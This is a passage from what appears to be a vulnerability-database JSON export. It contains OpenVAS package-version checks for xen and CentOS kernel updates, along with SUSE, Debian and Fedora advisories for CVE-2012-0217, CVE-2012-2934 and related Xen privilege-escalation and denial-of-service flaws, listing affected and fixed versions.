Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082824.html\");\n script_id(864509);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:18 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-9386\");\n script_name(\"Fedora Update for xen FEDORA-2012-9386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~20.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:58:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "Check for the Version of xen", "modified": "2017-12-29T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864599", "href": "http://plugins.openvas.org/nasl.php?oid=864599", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11182", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11182\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 17\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084648.html\");\n script_id(864599);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 11:22:33 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\",\n \"CVE-2012-3432\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-11182\");\n script_name(\"Fedora Update for xen FEDORA-2012-11182\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~24.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:1361412562310864599", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864599", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11182", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11182\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084648.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864599\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 11:22:33 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\",\n \"CVE-2012-3432\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-11182\");\n script_name(\"Fedora Update for xen FEDORA-2012-11182\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"xen on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~24.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-06-28T00:00:00", "id": "OPENVAS:1361412562310864494", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864494", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9399", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082754.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864494\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:34:52 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\",\n \"CVE-2012-0029\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-9399\");\n script_name(\"Fedora Update for xen FEDORA-2012-9399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"xen on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~8.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-01-11T11:07:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "Check for the Version of xen", "modified": "2018-01-10T00:00:00", "published": "2012-06-28T00:00:00", "id": "OPENVAS:864494", "href": "http://plugins.openvas.org/nasl.php?oid=864494", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9399", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 16\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082754.html\");\n script_id(864494);\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:34:52 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\",\n \"CVE-2012-0029\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-9399\");\n script_name(\"Fedora Update for xen FEDORA-2012-9399\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~8.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.4, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:07:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "Check for the Version of kernel", "modified": "2018-01-05T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881107", "href": "http://plugins.openvas.org/nasl.php?oid=881107", "type": "openvas", "title": "CentOS Update for kernel CESA-2012:0721 centos5 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2012:0721 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issues:\n \n * It was found that the Xen hypervisor implementation as shipped with Red\n Hat Enterprise Linux 5 did not properly restrict the syscall return\n addresses in the sysret return path to canonical addresses. An unprivileged\n user in a 64-bit para-virtualized guest, that is running on a 64-bit host\n that has an Intel CPU, could use this flaw to crash the host or,\n potentially, escalate their privileges, allowing them to execute arbitrary\n code at the hypervisor level. (CVE-2012-0217, Important)\n \n * It was found that guests could trigger a bug in earlier AMD CPUs, leading\n to a CPU hard lockup, when running on the Xen hypervisor implementation. An\n unprivileged user in a 64-bit para-virtualized guest could use this flaw to\n crash the host. Warning: After installing this update, hosts that are using\n an affected AMD CPU (refer to Red Hat Bugzilla bug #824966 for a list) will\n fail to boot. In order to boot such hosts, the new kernel parameter,\n allow_unsafe, can be used ("allow_unsafe=on"). This option should only be\n used with hosts that are running trusted guests, as setting it to "on"\n reintroduces the flaw (allowing guests to crash the host). (CVE-2012-2934,\n Moderate)\n \n Note: For Red Hat Enterprise Linux guests, only privileged guest users can\n exploit the CVE-2012-0217 and CVE-2012-2934 issues.\n \n Red Hat would like to thank the Xen project for reporting these issues.\n Upstream acknowledges Rafal Wojtczuk as the original reporter of\n CVE-2012-0217.\n \n Users should upgrade to these updated packages, which contain backported\n patches to correct these issues. The system must be rebooted for this\n update to take effect.\";\n\ntag_affected = \"kernel on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-June/018678.html\");\n script_id(881107);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:09:17 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-2934\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0721\");\n script_name(\"CentOS Update for kernel CESA-2012:0721 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:05:35", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "This update of XEN fixed multiple security flaws that could\n be exploited by local attackers to cause a Denial of\n Service or potentially escalate privileges. Additionally,\n several other upstream changes were backported.\n\n", "edition": 1, "modified": "2012-07-18T15:08:32", "published": "2012-07-18T15:08:32", "id": "OPENSUSE-SU-2012:0886-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00008.html", "type": "suse", "title": "xen (critical)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:47:49", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "Three security issues were found in XEN.\n\n Two security issues are fixed by this update:\n\n *\n\n CVE-2012-0217: Due to incorrect fault handling in the\n XEN hypervisor it was possible for a XEN guest domain\n administrator to execute code in the XEN host environment.\n\n *\n\n CVE-2012-0218: Also a guest user could crash the\n guest XEN kernel due to a protection fault bounce.\n\n The third fix is changing the Xen behaviour on certain\n hardware:\n\n *\n\n CVE-2012-2934: The issue is a denial of service issue\n on older pre-SVM AMD CPUs (AMD Erratum 121).\n\n AMD Erratum #121 is described in "Revision Guide for\n AMD Athlon 64 and AMD Opteron Processors":\n <a rel=\"nofollow\" href=\"http://support.amd.com/us/Processor_TechDocs/25759.pdf\">http://support.amd.com/us/Processor_TechDocs/25759.pdf</a>\n <<a rel=\"nofollow\" href=\"http://support.amd.com/us/Processor_TechDocs/25759.pdf\">http://support.amd.com/us/Processor_TechDocs/25759.pdf</a>>\n\n The following 130nm and 90nm (DDR1-only) AMD\n processors are subject to this erratum:\n\n o\n\n First-generation AMD-Opteron(tm) single and\n dual core processors in either 939 or 940 packages:\n\n + AMD Opteron(tm) 100-Series Processors\n + AMD Opteron(tm) 200-Series Processors\n + AMD Opteron(tm) 800-Series Processors\n + AMD Athlon(tm) processors in either 754,\n 939 or 940 packages\n + AMD Sempron(tm) processor in either 754\n or 939 packages\n + AMD Turion(tm) Mobile Technology in 754\n package\n\n This issue does not effect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except\n by upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guestsystems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option "allow_unsafe" for\n GRUB which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line\n looking like this:\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... in this example represents the existing\n boot options for the host.\n", "edition": 1, "modified": "2012-06-12T23:08:27", "published": "2012-06-12T23:08:27", "id": "SUSE-SU-2012:0730-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-06/msg00008.html", "title": "Security update for Xen (critical)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:16:01", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2501-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJune 24, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xen\nVulnerability : several\nProblem type : local\nDebian-specific: no\nCVE ID : CVE-2012-0217 CVE-2012-0218 CVE-2012-2934\n\nSeveral vulnerabilities were discovered in Xen, a hypervisor.\n\nCVE-2012-0217\n\tXen does not properly handle uncanonical return addresses on\n\tIntel amd64 CPUs, allowing amd64 PV guests to elevate to\n\thypervisor privileges. AMD processors, HVM and i386 guests\n\tare not affected.\n\nCVE-2012-0218\n\tXen does not properly handle SYSCALL and SYSENTER instructions\n\tin PV guests, allowing unprivileged users inside a guest\n\tsystem to crash the guest system.\n\nCVE-2012-2934\n\tXen does not detect old AMD CPUs affected by AMD Erratum #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the "allow_unsafe" option is passed.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 4.0.1-5.2.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), these problems have been fixed in version\n4.1.3~rc1+hg-20120614.a9c0a89c08f2-1.\n\nWe recommend that you upgrade your xen packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2012-06-24T15:22:55", "published": "2012-06-24T15:22:55", "id": "DEBIAN:DSA-2501-1:A44C3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00140.html", "title": "[SECURITY] [DSA 2501-1] xen security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:20:21", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2508-1 security@debian.org\nhttp://www.debian.org/security/ Yves-Alexis Perez\nJuly 22, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : kfreebsd-8\nVulnerability : privilege escalation\nProblem type : local\nDebian-specific: no\nCVE ID : CVE-2012-0217\nDebian Bug : 677297\n\nRafal Wojtczuk from Bromium discovered that FreeBSD wasn't handling correctly\nuncanonical return addresses on Intel amd64 CPUs, allowing privilege escalation\nto kernel for local users.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 8.1+dfsg-8+squeeze3.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 8.3-4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 8.3-4.\n\nWe recommend that you upgrade your kfreebsd-8 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2012-07-22T12:23:05", "published": "2012-07-22T12:23:05", "id": "DEBIAN:DSA-2508-1:4DE0E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00155.html", "title": "[SECURITY] [DSA 2508-1] kfreebsd-8 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-06-26T00:52:23", "published": "2012-06-26T00:52:23", "id": "FEDORA:00A04209F2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.2-20.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines 